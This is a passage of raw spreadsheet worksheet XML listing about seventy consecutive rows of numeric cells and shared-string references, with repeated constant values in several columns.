      <c r="A33915" s="1">
        <v>13206.0</v>
      </c>
      <c r="B33915" s="2">
        <v>3.4140722E7</v>
      </c>
      <c r="C33915" s="2" t="s">
        <v>32651</v>
      </c>
      <c r="D33915" s="2">
        <v>1.0</v>
      </c>
      <c r="E33915" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33915" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33916" ht="15.75" customHeight="1">
      <c r="A33916" s="1">
        <v>13218.0</v>
      </c>
      <c r="B33916" s="2">
        <v>3.4207776E7</v>
      </c>
      <c r="C33916" s="2" t="s">
        <v>32652</v>
      </c>
      <c r="D33916" s="2">
        <v>1.0</v>
      </c>
      <c r="E33916" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33916" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33917" ht="15.75" customHeight="1">
      <c r="A33917" s="1">
        <v>13245.0</v>
      </c>
      <c r="B33917" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C33917" s="2" t="s">
        <v>32653</v>
      </c>
      <c r="D33917" s="2">
        <v>1.0</v>
      </c>
      <c r="E33917" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33917" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33918" ht="15.75" customHeight="1">
      <c r="A33918" s="1">
        <v>13377.0</v>
      </c>
      <c r="B33918" s="2">
        <v>3.4875459E7</v>
      </c>
      <c r="C33918" s="2" t="s">
        <v>32654</v>
      </c>
      <c r="D33918" s="2">
        <v>1.0</v>
      </c>
      <c r="E33918" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33918" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33919" ht="15.75" customHeight="1">
      <c r="A33919" s="1">
        <v>13399.0</v>
      </c>
      <c r="B33919" s="2">
        <v>3.4984681E7</v>
      </c>
      <c r="C33919" s="2" t="s">
        <v>32655</v>
      </c>
      <c r="D33919" s="2">
        <v>1.0</v>
      </c>
      <c r="E33919" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33919" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33920" ht="15.75" customHeight="1">
      <c r="A33920" s="1">
        <v>13447.0</v>
      </c>
      <c r="B33920" s="2">
        <v>3.5171284E7</v>
      </c>
      <c r="C33920" s="2" t="s">
        <v>32656</v>
      </c>
      <c r="D33920" s="2">
        <v>1.0</v>
      </c>
      <c r="E33920" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33920" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33921" ht="15.75" customHeight="1">
      <c r="A33921" s="1">
        <v>13455.0</v>
      </c>
      <c r="B33921" s="2">
        <v>3.518977E7</v>
      </c>
      <c r="C33921" s="2" t="s">
        <v>32657</v>
      </c>
      <c r="D33921" s="2">
        <v>1.0</v>
      </c>
      <c r="E33921" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33921" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33922" ht="15.75" customHeight="1">
      <c r="A33922" s="1">
        <v>13488.0</v>
      </c>
      <c r="B33922" s="2">
        <v>3.5387201E7</v>
      </c>
      <c r="C33922" s="2" t="s">
        <v>32658</v>
      </c>
      <c r="D33922" s="2">
        <v>1.0</v>
      </c>
      <c r="E33922" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33922" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33923" ht="15.75" customHeight="1">
      <c r="A33923" s="1">
        <v>13493.0</v>
      </c>
      <c r="B33923" s="2">
        <v>3.5399449E7</v>
      </c>
      <c r="C33923" s="2" t="s">
        <v>32659</v>
      </c>
      <c r="D33923" s="2">
        <v>1.0</v>
      </c>
      <c r="E33923" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33923" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33924" ht="15.75" customHeight="1">
      <c r="A33924" s="1">
        <v>13507.0</v>
      </c>
      <c r="B33924" s="2">
        <v>3.5447216E7</v>
      </c>
      <c r="C33924" s="2" t="s">
        <v>32660</v>
      </c>
      <c r="D33924" s="2">
        <v>1.0</v>
      </c>
      <c r="E33924" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33924" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33925" ht="15.75" customHeight="1">
      <c r="A33925" s="1">
        <v>13524.0</v>
      </c>
      <c r="B33925" s="2">
        <v>3.5514139E7</v>
      </c>
      <c r="C33925" s="2" t="s">
        <v>32661</v>
      </c>
      <c r="D33925" s="2">
        <v>1.0</v>
      </c>
      <c r="E33925" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33925" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33926" ht="15.75" customHeight="1">
      <c r="A33926" s="1">
        <v>13533.0</v>
      </c>
      <c r="B33926" s="2">
        <v>3.5600933E7</v>
      </c>
      <c r="C33926" s="2" t="s">
        <v>32662</v>
      </c>
      <c r="D33926" s="2">
        <v>1.0</v>
      </c>
      <c r="E33926" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33926" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33927" ht="15.75" customHeight="1">
      <c r="A33927" s="1">
        <v>13576.0</v>
      </c>
      <c r="B33927" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C33927" s="2" t="s">
        <v>32663</v>
      </c>
      <c r="D33927" s="2">
        <v>1.0</v>
      </c>
      <c r="E33927" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33927" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33928" ht="15.75" customHeight="1">
      <c r="A33928" s="1">
        <v>13623.0</v>
      </c>
      <c r="B33928" s="2">
        <v>3.5874039E7</v>
      </c>
      <c r="C33928" s="2" t="s">
        <v>32664</v>
      </c>
      <c r="D33928" s="2">
        <v>1.0</v>
      </c>
      <c r="E33928" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33928" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33929" ht="15.75" customHeight="1">
      <c r="A33929" s="1">
        <v>13632.0</v>
      </c>
      <c r="B33929" s="2">
        <v>3.5888441E7</v>
      </c>
      <c r="C33929" s="2" t="s">
        <v>32665</v>
      </c>
      <c r="D33929" s="2">
        <v>1.0</v>
      </c>
      <c r="E33929" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33929" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33930" ht="15.75" customHeight="1">
      <c r="A33930" s="1">
        <v>13661.0</v>
      </c>
      <c r="B33930" s="2">
        <v>3.5976258E7</v>
      </c>
      <c r="C33930" s="2" t="s">
        <v>32666</v>
      </c>
      <c r="D33930" s="2">
        <v>1.0</v>
      </c>
      <c r="E33930" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33930" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33931" ht="15.75" customHeight="1">
      <c r="A33931" s="1">
        <v>13701.0</v>
      </c>
      <c r="B33931" s="2">
        <v>3.6163014E7</v>
      </c>
      <c r="C33931" s="2" t="s">
        <v>32667</v>
      </c>
      <c r="D33931" s="2">
        <v>1.0</v>
      </c>
      <c r="E33931" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33931" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33932" ht="15.75" customHeight="1">
      <c r="A33932" s="1">
        <v>13750.0</v>
      </c>
      <c r="B33932" s="2">
        <v>3.6486449E7</v>
      </c>
      <c r="C33932" s="2" t="s">
        <v>32668</v>
      </c>
      <c r="D33932" s="2">
        <v>1.0</v>
      </c>
      <c r="E33932" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33932" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33933" ht="15.75" customHeight="1">
      <c r="A33933" s="1">
        <v>13768.0</v>
      </c>
      <c r="B33933" s="2">
        <v>3.652861E7</v>
      </c>
      <c r="C33933" s="2" t="s">
        <v>32669</v>
      </c>
      <c r="D33933" s="2">
        <v>1.0</v>
      </c>
      <c r="E33933" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33933" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33934" ht="15.75" customHeight="1">
      <c r="A33934" s="1">
        <v>13810.0</v>
      </c>
      <c r="B33934" s="2">
        <v>3.6669353E7</v>
      </c>
      <c r="C33934" s="2" t="s">
        <v>32670</v>
      </c>
      <c r="D33934" s="2">
        <v>1.0</v>
      </c>
      <c r="E33934" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33934" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33935" ht="15.75" customHeight="1">
      <c r="A33935" s="1">
        <v>13847.0</v>
      </c>
      <c r="B33935" s="2">
        <v>3.6849767E7</v>
      </c>
      <c r="C33935" s="2" t="s">
        <v>32671</v>
      </c>
      <c r="D33935" s="2">
        <v>1.0</v>
      </c>
      <c r="E33935" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33935" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33936" ht="15.75" customHeight="1">
      <c r="A33936" s="1">
        <v>13902.0</v>
      </c>
      <c r="B33936" s="2">
        <v>3.7063387E7</v>
      </c>
      <c r="C33936" s="2" t="s">
        <v>32672</v>
      </c>
      <c r="D33936" s="2">
        <v>1.0</v>
      </c>
      <c r="E33936" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33936" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33937" ht="15.75" customHeight="1">
      <c r="A33937" s="1">
        <v>13910.0</v>
      </c>
      <c r="B33937" s="2">
        <v>3.7097171E7</v>
      </c>
      <c r="C33937" s="2" t="s">
        <v>32673</v>
      </c>
      <c r="D33937" s="2">
        <v>1.0</v>
      </c>
      <c r="E33937" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33937" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33938" ht="15.75" customHeight="1">
      <c r="A33938" s="1">
        <v>13941.0</v>
      </c>
      <c r="B33938" s="2">
        <v>3.7170977E7</v>
      </c>
      <c r="C33938" s="2" t="s">
        <v>32674</v>
      </c>
      <c r="D33938" s="2">
        <v>1.0</v>
      </c>
      <c r="E33938" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33938" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33939" ht="15.75" customHeight="1">
      <c r="A33939" s="1">
        <v>13995.0</v>
      </c>
      <c r="B33939" s="2">
        <v>3.7383221E7</v>
      </c>
      <c r="C33939" s="2" t="s">
        <v>32675</v>
      </c>
      <c r="D33939" s="2">
        <v>1.0</v>
      </c>
      <c r="E33939" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33939" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33940" ht="15.75" customHeight="1">
      <c r="A33940" s="1">
        <v>13998.0</v>
      </c>
      <c r="B33940" s="2">
        <v>3.7383221E7</v>
      </c>
      <c r="C33940" s="2" t="s">
        <v>32676</v>
      </c>
      <c r="D33940" s="2">
        <v>1.0</v>
      </c>
      <c r="E33940" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33940" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33941" ht="15.75" customHeight="1">
      <c r="A33941" s="1">
        <v>14012.0</v>
      </c>
      <c r="B33941" s="2">
        <v>3.7422467E7</v>
      </c>
      <c r="C33941" s="2" t="s">
        <v>32677</v>
      </c>
      <c r="D33941" s="2">
        <v>1.0</v>
      </c>
      <c r="E33941" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33941" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33942" ht="15.75" customHeight="1">
      <c r="A33942" s="1">
        <v>14027.0</v>
      </c>
      <c r="B33942" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C33942" s="2" t="s">
        <v>32678</v>
      </c>
      <c r="D33942" s="2">
        <v>1.0</v>
      </c>
      <c r="E33942" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33942" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33943" ht="15.75" customHeight="1">
      <c r="A33943" s="1">
        <v>14038.0</v>
      </c>
      <c r="B33943" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C33943" s="2" t="s">
        <v>32679</v>
      </c>
      <c r="D33943" s="2">
        <v>1.0</v>
      </c>
      <c r="E33943" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33943" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33944" ht="15.75" customHeight="1">
      <c r="A33944" s="1">
        <v>14041.0</v>
      </c>
      <c r="B33944" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C33944" s="2" t="s">
        <v>32680</v>
      </c>
      <c r="D33944" s="2">
        <v>1.0</v>
      </c>
      <c r="E33944" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33944" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33945" ht="15.75" customHeight="1">
      <c r="A33945" s="1">
        <v>14067.0</v>
      </c>
      <c r="B33945" s="2">
        <v>3.7603038E7</v>
      </c>
      <c r="C33945" s="2" t="s">
        <v>32681</v>
      </c>
      <c r="D33945" s="2">
        <v>1.0</v>
      </c>
      <c r="E33945" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33945" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33946" ht="15.75" customHeight="1">
      <c r="A33946" s="1">
        <v>14073.0</v>
      </c>
      <c r="B33946" s="2">
        <v>3.7658703E7</v>
      </c>
      <c r="C33946" s="2" t="s">
        <v>32682</v>
      </c>
      <c r="D33946" s="2">
        <v>1.0</v>
      </c>
      <c r="E33946" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33946" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33947" ht="15.75" customHeight="1">
      <c r="A33947" s="1">
        <v>14138.0</v>
      </c>
      <c r="B33947" s="2">
        <v>3.793798E7</v>
      </c>
      <c r="C33947" s="2" t="s">
        <v>32683</v>
      </c>
      <c r="D33947" s="2">
        <v>1.0</v>
      </c>
      <c r="E33947" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33947" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33948" ht="15.75" customHeight="1">
      <c r="A33948" s="1">
        <v>14211.0</v>
      </c>
      <c r="B33948" s="2">
        <v>3.8271604E7</v>
      </c>
      <c r="C33948" s="2" t="s">
        <v>32684</v>
      </c>
      <c r="D33948" s="2">
        <v>1.0</v>
      </c>
      <c r="E33948" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33948" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33949" ht="15.75" customHeight="1">
      <c r="A33949" s="1">
        <v>14220.0</v>
      </c>
      <c r="B33949" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C33949" s="2" t="s">
        <v>32685</v>
      </c>
      <c r="D33949" s="2">
        <v>1.0</v>
      </c>
      <c r="E33949" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33949" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33950" ht="15.75" customHeight="1">
      <c r="A33950" s="1">
        <v>14243.0</v>
      </c>
      <c r="B33950" s="2">
        <v>3.8336663E7</v>
      </c>
      <c r="C33950" s="2" t="s">
        <v>32686</v>
      </c>
      <c r="D33950" s="2">
        <v>1.0</v>
      </c>
      <c r="E33950" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33950" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33951" ht="15.75" customHeight="1">
      <c r="A33951" s="1">
        <v>14316.0</v>
      </c>
      <c r="B33951" s="2">
        <v>3.8679554E7</v>
      </c>
      <c r="C33951" s="2" t="s">
        <v>32687</v>
      </c>
      <c r="D33951" s="2">
        <v>1.0</v>
      </c>
      <c r="E33951" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33951" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33952" ht="15.75" customHeight="1">
      <c r="A33952" s="1">
        <v>14324.0</v>
      </c>
      <c r="B33952" s="2">
        <v>3.8724812E7</v>
      </c>
      <c r="C33952" s="2" t="s">
        <v>32688</v>
      </c>
      <c r="D33952" s="2">
        <v>1.0</v>
      </c>
      <c r="E33952" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33952" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33953" ht="15.75" customHeight="1">
      <c r="A33953" s="1">
        <v>14334.0</v>
      </c>
      <c r="B33953" s="2">
        <v>3.8765187E7</v>
      </c>
      <c r="C33953" s="2" t="s">
        <v>32689</v>
      </c>
      <c r="D33953" s="2">
        <v>1.0</v>
      </c>
      <c r="E33953" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33953" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33954" ht="15.75" customHeight="1">
      <c r="A33954" s="1">
        <v>14393.0</v>
      </c>
      <c r="B33954" s="2">
        <v>3.9091381E7</v>
      </c>
      <c r="C33954" s="2" t="s">
        <v>32690</v>
      </c>
      <c r="D33954" s="2">
        <v>1.0</v>
      </c>
      <c r="E33954" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33954" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33955" ht="15.75" customHeight="1">
      <c r="A33955" s="1">
        <v>14434.0</v>
      </c>
      <c r="B33955" s="2">
        <v>3.9283289E7</v>
      </c>
      <c r="C33955" s="2" t="s">
        <v>32691</v>
      </c>
      <c r="D33955" s="2">
        <v>1.0</v>
      </c>
      <c r="E33955" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33955" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33956" ht="15.75" customHeight="1">
      <c r="A33956" s="1">
        <v>14541.0</v>
      </c>
      <c r="B33956" s="2">
        <v>3.990653E7</v>
      </c>
      <c r="C33956" s="2" t="s">
        <v>32692</v>
      </c>
      <c r="D33956" s="2">
        <v>1.0</v>
      </c>
      <c r="E33956" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33956" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33957" ht="15.75" customHeight="1">
      <c r="A33957" s="1">
        <v>14644.0</v>
      </c>
      <c r="B33957" s="2">
        <v>4.0365209E7</v>
      </c>
      <c r="C33957" s="2" t="s">
        <v>32693</v>
      </c>
      <c r="D33957" s="2">
        <v>1.0</v>
      </c>
      <c r="E33957" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33957" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33958" ht="15.75" customHeight="1">
      <c r="A33958" s="1">
        <v>14678.0</v>
      </c>
      <c r="B33958" s="2">
        <v>4.0485969E7</v>
      </c>
      <c r="C33958" s="2" t="s">
        <v>32694</v>
      </c>
      <c r="D33958" s="2">
        <v>1.0</v>
      </c>
      <c r="E33958" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33958" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33959" ht="15.75" customHeight="1">
      <c r="A33959" s="1">
        <v>14826.0</v>
      </c>
      <c r="B33959" s="2">
        <v>4.099316E7</v>
      </c>
      <c r="C33959" s="2" t="s">
        <v>32695</v>
      </c>
      <c r="D33959" s="2">
        <v>1.0</v>
      </c>
      <c r="E33959" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33959" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33960" ht="15.75" customHeight="1">
      <c r="A33960" s="1">
        <v>14863.0</v>
      </c>
      <c r="B33960" s="2">
        <v>4.1070464E7</v>
      </c>
      <c r="C33960" s="2" t="s">
        <v>32696</v>
      </c>
      <c r="D33960" s="2">
        <v>1.0</v>
      </c>
      <c r="E33960" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33960" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33961" ht="15.75" customHeight="1">
      <c r="A33961" s="1">
        <v>14885.0</v>
      </c>
      <c r="B33961" s="2">
        <v>4.1127042E7</v>
      </c>
      <c r="C33961" s="2" t="s">
        <v>32697</v>
      </c>
      <c r="D33961" s="2">
        <v>1.0</v>
      </c>
      <c r="E33961" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33961" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33962" ht="15.75" customHeight="1">
      <c r="A33962" s="1">
        <v>14990.0</v>
      </c>
      <c r="B33962" s="2">
        <v>4.1416145E7</v>
      </c>
      <c r="C33962" s="2" t="s">
        <v>32698</v>
      </c>
      <c r="D33962" s="2">
        <v>1.0</v>
      </c>
      <c r="E33962" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33962" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33963" ht="15.75" customHeight="1">
      <c r="A33963" s="1">
        <v>15041.0</v>
      </c>
      <c r="B33963" s="2">
        <v>4.1595822E7</v>
      </c>
      <c r="C33963" s="2" t="s">
        <v>32699</v>
      </c>
      <c r="D33963" s="2">
        <v>1.0</v>
      </c>
      <c r="E33963" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33963" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33964" ht="15.75" customHeight="1">
      <c r="A33964" s="1">
        <v>15139.0</v>
      </c>
      <c r="B33964" s="2">
        <v>4.1925922E7</v>
      </c>
      <c r="C33964" s="2" t="s">
        <v>32700</v>
      </c>
      <c r="D33964" s="2">
        <v>1.0</v>
      </c>
      <c r="E33964" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33964" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33965" ht="15.75" customHeight="1">
      <c r="A33965" s="1">
        <v>15142.0</v>
      </c>
      <c r="B33965" s="2">
        <v>4.192944E7</v>
      </c>
      <c r="C33965" s="2" t="s">
        <v>32701</v>
      </c>
      <c r="D33965" s="2">
        <v>1.0</v>
      </c>
      <c r="E33965" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33965" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33966" ht="15.75" customHeight="1">
      <c r="A33966" s="1">
        <v>15166.0</v>
      </c>
      <c r="B33966" s="2">
        <v>4.2004434E7</v>
      </c>
      <c r="C33966" s="2" t="s">
        <v>32702</v>
      </c>
      <c r="D33966" s="2">
        <v>1.0</v>
      </c>
      <c r="E33966" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33966" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33967" ht="15.75" customHeight="1">
      <c r="A33967" s="1">
        <v>15242.0</v>
      </c>
      <c r="B33967" s="2">
        <v>4.227146E7</v>
      </c>
      <c r="C33967" s="2" t="s">
        <v>32703</v>
      </c>
      <c r="D33967" s="2">
        <v>1.0</v>
      </c>
      <c r="E33967" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33967" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33968" ht="15.75" customHeight="1">
      <c r="A33968" s="1">
        <v>15317.0</v>
      </c>
      <c r="B33968" s="2">
        <v>4.2513962E7</v>
      </c>
      <c r="C33968" s="2" t="s">
        <v>32704</v>
      </c>
      <c r="D33968" s="2">
        <v>1.0</v>
      </c>
      <c r="E33968" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33968" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33969" ht="15.75" customHeight="1">
      <c r="A33969" s="1">
        <v>15409.0</v>
      </c>
      <c r="B33969" s="2">
        <v>4.285575E7</v>
      </c>
      <c r="C33969" s="2" t="s">
        <v>32705</v>
      </c>
      <c r="D33969" s="2">
        <v>1.0</v>
      </c>
      <c r="E33969" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33969" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33970" ht="15.75" customHeight="1">
      <c r="A33970" s="1">
        <v>15473.0</v>
      </c>
      <c r="B33970" s="2">
        <v>4.3143841E7</v>
      </c>
      <c r="C33970" s="2" t="s">
        <v>32706</v>
      </c>
      <c r="D33970" s="2">
        <v>1.0</v>
      </c>
      <c r="E33970" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33970" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33971" ht="15.75" customHeight="1">
      <c r="A33971" s="1">
        <v>15517.0</v>
      </c>
      <c r="B33971" s="2">
        <v>4.3281356E7</v>
      </c>
      <c r="C33971" s="2" t="s">
        <v>32707</v>
      </c>
      <c r="D33971" s="2">
        <v>1.0</v>
      </c>
      <c r="E33971" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33971" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33972" ht="15.75" customHeight="1">
      <c r="A33972" s="1">
        <v>15553.0</v>
      </c>
      <c r="B33972" s="2">
        <v>4.3406596E7</v>
      </c>
      <c r="C33972" s="2" t="s">
        <v>32708</v>
      </c>
      <c r="D33972" s="2">
        <v>1.0</v>
      </c>
      <c r="E33972" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33972" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33973" ht="15.75" customHeight="1">
      <c r="A33973" s="1">
        <v>15555.0</v>
      </c>
      <c r="B33973" s="2">
        <v>4.3406596E7</v>
      </c>
      <c r="C33973" s="2" t="s">
        <v>32709</v>
      </c>
      <c r="D33973" s="2">
        <v>1.0</v>
      </c>
      <c r="E33973" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33973" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33974" ht="15.75" customHeight="1">
      <c r="A33974" s="1">
        <v>15558.0</v>
      </c>
      <c r="B33974" s="2">
        <v>4.3423433E7</v>
      </c>
      <c r="C33974" s="2" t="s">
        <v>32710</v>
      </c>
      <c r="D33974" s="2">
        <v>1.0</v>
      </c>
      <c r="E33974" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33974" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33975" ht="15.75" customHeight="1">
      <c r="A33975" s="1">
        <v>15619.0</v>
      </c>
      <c r="B33975" s="2">
        <v>4.3554669E7</v>
      </c>
      <c r="C33975" s="2" t="s">
        <v>32711</v>
      </c>
      <c r="D33975" s="2">
        <v>1.0</v>
      </c>
      <c r="E33975" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33975" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33976" ht="15.75" customHeight="1">
      <c r="A33976" s="1">
        <v>15628.0</v>
      </c>
      <c r="B33976" s="2">
        <v>4.3576309E7</v>
      </c>
      <c r="C33976" s="2" t="s">
        <v>32712</v>
      </c>
      <c r="D33976" s="2">
        <v>1.0</v>
      </c>
      <c r="E33976" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33976" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33977" ht="15.75" customHeight="1">
      <c r="A33977" s="1">
        <v>15652.0</v>
      </c>
      <c r="B33977" s="2">
        <v>4.362542E7</v>
      </c>
      <c r="C33977" s="2" t="s">
        <v>32713</v>
      </c>
      <c r="D33977" s="2">
        <v>1.0</v>
      </c>
      <c r="E33977" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33977" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33978" ht="15.75" customHeight="1">
      <c r="A33978" s="1">
        <v>15723.0</v>
      </c>
      <c r="B33978" s="2">
        <v>4.4003655E7</v>
      </c>
      <c r="C33978" s="2" t="s">
        <v>32714</v>
      </c>
      <c r="D33978" s="2">
        <v>1.0</v>
      </c>
      <c r="E33978" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33978" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33979" ht="15.75" customHeight="1">
      <c r="A33979" s="1">
        <v>15868.0</v>
      </c>
      <c r="B33979" s="2">
        <v>4.4501107E7</v>
      </c>
      <c r="C33979" s="2" t="s">
        <v>32715</v>
      </c>
      <c r="D33979" s="2">
        <v>1.0</v>
      </c>
      <c r="E33979" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33979" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33980" ht="15.75" customHeight="1">
      <c r="A33980" s="1">
        <v>15877.0</v>
      </c>
      <c r="B33980" s="2">
        <v>4.4504641E7</v>
      </c>
      <c r="C33980" s="2" t="s">
        <v>32716</v>
      </c>
      <c r="D33980" s="2">
        <v>1.0</v>
      </c>
      <c r="E33980" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33980" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33981" ht="15.75" customHeight="1">
      <c r="A33981" s="1">
        <v>15958.0</v>
      </c>
      <c r="B33981" s="2">
        <v>4.4770538E7</v>
      </c>
      <c r="C33981" s="2" t="s">
        <v>32717</v>
      </c>
      <c r="D33981" s="2">
        <v>1.0</v>
      </c>
      <c r="E33981" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33981" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33982" ht="15.75" customHeight="1">
